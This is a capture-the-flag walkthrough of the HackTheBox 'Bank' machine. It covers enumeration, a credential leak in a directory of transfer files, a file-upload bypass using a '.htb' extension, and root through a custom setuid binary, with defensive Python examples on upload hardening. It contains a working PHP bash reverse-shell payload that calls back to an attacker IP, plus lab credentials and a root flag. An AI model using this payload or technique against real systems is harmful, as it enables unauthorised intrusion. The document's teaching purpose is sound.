Bank

htb linux easy dns file-upload suid web-exploitation

Machine Information

  • Platform: Linux
  • Difficulty: Easy
  • IP Address: 10.129.29.200

Initial Enumeration

Nmap Scan

attacker@kali:~$ nmap -sT -p- --min-rate 5000 10.129.29.200

Nmap Port Scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-09 17:44 CDT
Nmap scan report for 10.129.29.200
Host is up (0.0087s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

Detailed Service Scan

attacker@kali:~$ nmap -sV -sC -p 22,53,80 10.129.29.200
Nmap Service Scan Results

The presence of DNS (port 53) suggests we should enumerate DNS records.


Service Enumeration

DNS Enumeration

Port 53 tells us the host runs its own nameserver, which usually means it is authoritative for a domain the web application is served under; it does not tell us the name itself. HTB machines conventionally use <machine>.htb, so I added bank.htb for the target IP to /etc/hosts. To check the guess against the target's own nameserver rather than assume it, `dig @10.129.29.200 bank.htb` queries it for the name directly, and `dig axfr bank.htb @10.129.29.200` tests whether the zone can be transferred, which would list every hostname it serves:

/etc/hosts

127.0.0.1       localhost
127.0.1.1       kali

10.129.29.200   bank.htb

Web Application

Navigating to http://bank.htb reveals a banking application with a login portal.

Important Discovery
Without adding bank.htb to /etc/hosts, visiting http://10.129.29.200 shows only the default Apache page. The web application uses virtual hosting and requires the proper hostname.

Directory Enumeration

attacker@kali:~$ gobuster dir -u http://bank.htb/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
Gobuster Directory Enumeration

Balance Transfer Directory

The /balance-transfer/ directory contains hundreds of encrypted account transfer files. Most files are around 584 bytes, but sorting by size reveals one file that is only 257 bytes, significantly smaller than the rest. Apache's directory index exposes this directly: requesting /balance-transfer/?C=S;O=A (or clicking the Size column header) sorts the listing by size in ascending order, so the odd one out is the first entry.

68576f20e9732f1b2edc4df5b8533230.acc
++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803
.
===UserAccount===

Despite the ++OK ENCRYPT SUCCESS banner, the body of this file is plaintext and contains credentials. The encryption step apparently failed for this one record, and the unencrypted body is shorter than the encrypted ones, which is exactly why it stood out by size.

Credentials: chris@bank.htb:!##HTBB4nkP4ssw0rd!##
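The size-sorting trick generalises beyond this one directory. The script below is an added example, not part of the original write-up: it parses an Apache autoindex page, converts the human-readable size column to bytes, sorts the entries and flags anything that deviates from the median. The listing embedded in it is constructed to mimic the /balance-transfer/ layout with only a handful of rows; apart from 68576f20e9732f1b2edc4df5b8533230.acc the file names are made up.

```python
"""Flag size outliers in an Apache directory listing (added example)."""
import re
import statistics
import sys
import urllib.request

# Constructed sample of an Apache autoindex page for /balance-transfer/.
# Only the 257-byte file name is real; the other names are made up.
SAMPLE_INDEX = """<html><body><h1>Index of /balance-transfer</h1>
<table>
<tr><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th></tr>
<tr><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td></tr>
<tr><td><a href="0a0a2d3e2c9d6c4e8b7a1f2e3d4c5b6a.acc">0a0a2d3e2c9d6c4e8b7a1f2e3d4c5b6a.acc</a></td><td align="right">2017-05-28 23:15  </td><td align="right">584 </td></tr>
<tr><td><a href="1b1b3e4f3d0e7d5f9c8b2a3f4e5d6c7b.acc">1b1b3e4f3d0e7d5f9c8b2a3f4e5d6c7b.acc</a></td><td align="right">2017-05-28 23:15  </td><td align="right">585 </td></tr>
<tr><td><a href="68576f20e9732f1b2edc4df5b8533230.acc">68576f20e9732f1b2edc4df5b8533230.acc</a></td><td align="right">2017-05-28 23:15  </td><td align="right">257 </td></tr>
<tr><td><a href="2c2c4f5a4e1f8e6a0d9c3b4a5f6e7d8c.acc">2c2c4f5a4e1f8e6a0d9c3b4a5f6e7d8c.acc</a></td><td align="right">2017-05-28 23:15  </td><td align="right">583 </td></tr>
</table></body></html>
"""

# One data row: the file link, then (skipping the date cell) the right-aligned
# size cell that closes the row. Sort links (?C=...) and the parent link (/) are
# excluded by the first character of the href.
ROW_RE = re.compile(
    r'<a href="(?P<name>[^"?/][^"]*)">.*?'
    r'<td align="right">\s*(?P<size>[\d.]+\s*[KMG]?|-)\s*</td>\s*</tr>',
    re.DOTALL,
)
UNIT = {"": 1, "K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}


def parse_size(text):
    """Convert an autoindex size cell ('584 ', '1.2K', '-') to bytes; None for directories."""
    text = text.strip()
    if text == "-":
        return None
    match = re.fullmatch(r"([\d.]+)\s*([KMG]?)", text)
    if match is None:
        raise ValueError(f"unrecognised size field: {text!r}")
    return int(float(match.group(1)) * UNIT[match.group(2)])


def parse_listing(html):
    """Return [(name, size_in_bytes), ...] for every file row of an autoindex page."""
    files = []
    for row in ROW_RE.finditer(html):
        size = parse_size(row.group("size"))
        if size is not None:
            files.append((row.group("name"), size))
    return files


def size_outliers(files, tolerance=0.25):
    """Entries whose size differs from the median by more than `tolerance` of the median."""
    if len(files) < 3:
        return list(files)
    median = statistics.median(size for _, size in files)
    return [(name, size) for name, size in files if abs(size - median) > tolerance * median]


if __name__ == "__main__":
    # Pass a URL such as http://bank.htb/balance-transfer/ to scan a live listing;
    # with no argument the constructed sample above is used.
    html = urllib.request.urlopen(sys.argv[1]).read().decode() if len(sys.argv) > 1 else SAMPLE_INDEX
    entries = parse_listing(html)
    for name, size in sorted(entries, key=lambda entry: entry[1]):
        print(f"{size:>8} {name}")
    print("outliers:", size_outliers(entries))
```

The median-based check is deliberately crude; on a directory where every record is the same encrypted format, anything that is not within a quarter of the typical size is worth opening first. Run it against the sample and the 257-byte record is the only entry flagged.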


Exploitation

File Upload Vulnerability

After logging in with the discovered credentials, I found a Support page that allows ticket creation with file attachments.

Attempting to upload a PHP reverse shell directly fails with “Only image files are allowed”. However, examining the page source reveals an interesting comment:

HTML Source Comment

<!-- [DEBUG] I added .htb extension for testing purposes. Uncomment it to let your name to display as a debugging resource.
TODO: Fix later. Erase this line. -->

This suggests two things: the upload allowlist was extended with .htb for debugging and never reverted, and the web server's handler configuration presumably maps .htb to the PHP interpreter (the kind of thing an Apache AddType or AddHandler line does). A .htb file would therefore pass the extension check and still run as code, which the next steps confirm.
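Why the extension allowlist did not stop this is worth modelling explicitly. The Python below is an added example, not code from the write-up or from the Bank application: it separates the two decisions that have to agree, the upload filter's allowlist and the web server's script-handler mapping, and contrasts the filter as observed with a hardened one. The allowlist, the handler table and the image signatures are assumptions based on the observed behaviour (.php rejected, .htb accepted and executed).

```python
"""Extension allowlist vs. script handler mapping (added example)."""
import os
import secrets

# Assumed upload allowlist: image types plus the ".htb" debug extension
# the HTML comment hints at.
UPLOAD_ALLOWLIST = {"jpg", "jpeg", "png", "gif", "htb"}

# Assumed handler mapping on the web server, the effect of an Apache line
# such as: AddType application/x-httpd-php .php .htb
SCRIPT_EXTENSIONS = {"php", "phtml", "htb"}

# Leading bytes of the image formats the form claims to accept.
IMAGE_SIGNATURES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

UPLOAD_DIR = "/uploads/"


def extension(filename):
    """Final extension, lower-cased, without the dot ('shell.PHP.png' -> 'png')."""
    return os.path.splitext(filename)[1].lstrip(".").lower()


def server_executes(path):
    """Would a request for this path be handed to the PHP interpreter?
    Simplified model: real Apache mod_mime looks at every extension in the
    name, so 'shell.php.png' can also run under some configurations."""
    return extension(path) in SCRIPT_EXTENSIONS


def vulnerable_upload(filename, content):
    """The filter as observed: the name is checked against the allowlist,
    the bytes are never inspected, and the client-chosen name is kept
    (hence the predictable /uploads/shell.htb)."""
    if extension(filename) not in UPLOAD_ALLOWLIST:
        return None                              # "Only image files are allowed"
    return UPLOAD_DIR + os.path.basename(filename)


def hardened_upload(filename, content):
    """Check the declared type against the bytes, then store under a
    server-chosen name whose extension is never a script extension."""
    ext = extension(filename)
    if ext not in IMAGE_SIGNATURES:
        return None
    if not content.startswith(IMAGE_SIGNATURES[ext]):
        return None                              # declared type does not match content
    stored_ext = "jpg" if ext == "jpeg" else ext
    stored = f"{secrets.token_hex(16)}.{stored_ext}"
    assert not server_executes(stored)           # invariant: uploads never reach PHP
    return UPLOAD_DIR + stored


def gives_code_execution(upload, filename, content):
    """True if `upload` accepts the file and the server would then execute it."""
    path = upload(filename, content)
    return path is not None and server_executes(path)


if __name__ == "__main__":
    PHP = b"<?php system($_GET['c']); ?>"
    PNG = IMAGE_SIGNATURES["png"] + b"\x00" * 16
    for name, data in [("shell.php", PHP), ("shell.htb", PHP), ("avatar.png", PNG + PHP)]:
        print(f"{name:12} vulnerable: {gives_code_execution(vulnerable_upload, name, data)!s:5}"
              f" hardened: {gives_code_execution(hardened_upload, name, data)}")
```

The vulnerable path keeps the client's filename, so whatever the server's handler table says about that name decides whether the upload is data or code; any extension added to the allowlist for convenience becomes a code-execution vector the moment Apache also maps it to PHP. The hardened version removes the dependency by choosing the stored name itself, and a polyglot PNG with PHP appended is accepted but never executed. Disabling script execution in the upload directory (for mod_php, `php_admin_flag engine off` inside the `<Directory>` block for /uploads) is the matching server-side control.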

Creating Reverse Shell

attacker@kali:~$ # Create PHP reverse shell with .htb extension
attacker@kali:~$ cat > shell.htb << 'EOF'
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.15.254/4444 0>&1'"); ?>
EOF

I uploaded shell.htb through the support ticket system. The file was stored under its original name at /uploads/shell.htb, so the path to request is predictable.

Triggering the Shell

attacker@kali:~$ # Start netcat listener
attacker@kali:~$ nc -nvlp 4444

Navigate to: http://bank.htb/uploads/shell.htb

Reverse Shell Connection
listening on [any] 4444 ...
connect to [10.10.15.254] from (UNKNOWN) [10.129.235.70] 53980
whoami
www-data
ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 May 28  2017 .
drwxr-xr-x 22 root  root  4096 Jan 11  2021 ..
drwxr-xr-x  3 chris chris 4096 May 29  2017 chris

Post-Exploitation Enumeration

SUID Binary Discovery

www-data@bank:/$ find / -perm -4000 2>/dev/null

SUID Binary Search Results

The custom SUID binary /var/htb/bin/emergency stands out: it is not a standard system binary and it lives outside the distribution's paths. Before running an unknown setuid executable it is worth a quick look at what it does (strings on the binary, or ltrace if installed, will usually show the command it spawns), since a setuid program can just as easily do something destructive as hand out a shell.

www-data@bank:/$ file /var/htb/bin/emergency

File Information
/var/htb/bin/emergency: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped

Privilege Escalation

Exploiting SUID Binary

www-data@bank:/$ /var/htb/bin/emergency

Root Shell Obtained
# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# whoami
root
# cd /root
# ls -la
total 36
drwx------  4 root root 4096 Oct 10 17:59 .
drwxr-xr-x 22 root root 4096 Jan 11  2021 ..
lrwxrwxrwx  1 root root    9 Jan 11  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3110 May 30  2017 .bashrc
drwx------  2 root root 4096 Jan 11  2021 .cache
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
drwxr-xr-x  2 root root 4096 Jan 11  2021 .rpmdb
-rw-r--r--  1 root root   66 May 29  2017 .selected_editor
-rw-------  1 root root  598 Jan 11  2021 .viminfo
-r--------  1 root root   33 Oct 10 17:59 root.txt

ROOT FLAG HTB
81e01ea258237dcc6cf4acd1ab971535

The /var/htb/bin/emergency binary drops us directly into a root shell: it is owned by root with the setuid bit set and spawns a shell without dropping privileges, so the shell inherits an effective uid of 0. Note that id reports uid=33 but euid=0, i.e. the real uid is still www-data. That is enough to read root.txt and most of the filesystem, but programs that check the real uid may still refuse; because the effective uid is 0, a setuid(0) call from this shell is permitted and sets the real uid as well, for example `python -c 'import os; os.setuid(0); os.system("/bin/bash")'` if python is available on the box.

Loot

Credentials

🔐 Bank Web Portal
Username: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
Host: bank.htb
Notes: Found in unencrypted balance transfer file 68576f20e9732f1b2edc4df5b8533230.acc

Key Takeaways

  1. Hostnames matter as much as IPs - an open DNS port is the hint that the target serves a named zone, and without bank.htb in /etc/hosts (or the right Host header) the name-based virtual host is invisible and only the default Apache page is served
  2. Sort by file size when investigating directories with many files - anomalies often reveal sensitive data
  3. HTML source comments can leak debugging information and alternative upload methods (.htb extension)
  4. Custom SUID binaries in non-standard locations (/var/htb/bin/) should always be investigated for privilege escalation
  5. File upload filters based solely on extension checking are only as safe as the server's handler configuration - an extension added to the allowlist for debugging (.htb here) becomes remote code execution the moment the web server also maps it to a script interpreter